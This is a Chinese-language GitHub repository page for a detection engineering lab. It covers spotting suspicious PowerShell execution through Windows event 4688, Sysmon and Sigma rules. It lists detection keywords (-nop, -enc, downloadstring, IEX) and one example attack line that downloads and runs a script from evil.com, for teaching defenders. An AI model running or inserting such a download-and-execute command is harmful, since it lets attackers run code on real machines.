waelsk95l/Detection-Engineering-Lab

GitHub: waelsk95l/Detection-Engineering-Lab

一个面向SOC分析师和检测工程师的实战化检测工程实验室,通过模拟PowerShell攻击技术并利用Sysmon、Windows事件日志和Sigma规则构建检测能力。

Stars: 0 | Forks: 0

# 检测工程实验室 本仓库包含实用的 SOC 检测工程实验,专注于利用 Windows 日志和 Sysmon 检测攻击者技术。 本项目的目标是模拟现实世界的攻击技术,并构建 SOC 分析师和检测工程师所使用的检测逻辑。 ## 实验环境 - Windows 11 目标机 - Kali Linux 攻击机 - Sysmon 日志记录 - Windows 事件日志 - Sigma 检测规则 ## 检测用例 ### 用例 1 – 可疑的 PowerShell 执行 此检测用于识别可能表明恶意活动的可疑 PowerShell 命令。 **日志来源** Windows 安全日志 **事件 ID** 4688 – 进程创建 **检测逻辑** 当 PowerShell 使用以下可疑参数执行时触发警报: - -nop - -enc - downloadstring - IEX 攻击示例: powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/script.ps1')" **MITRE ATT&CK** T1059.001 – PowerShell ## SOC 调查步骤 - 调查进程树 - 识别父进程 - 检查网络连接 - 判断活动是否恶意 - 如有需要,隔离主机 .
标签:AI合规, AMSI绕过, Cloudflare, EDR, MITRE ATT&CK, OpenCanary, PowerShell 攻击, RFI远程文件包含, Sigma 规则, Sysmon, Windows 11, Windows 事件日志, Windows 安全, 可疑命令检测, 域名分析, 威胁检测, 安全实验室, 安全运营中心, 攻击模拟, 网络安全, 网络映射, 脆弱性评估, 隐私保护, 驱动签名利用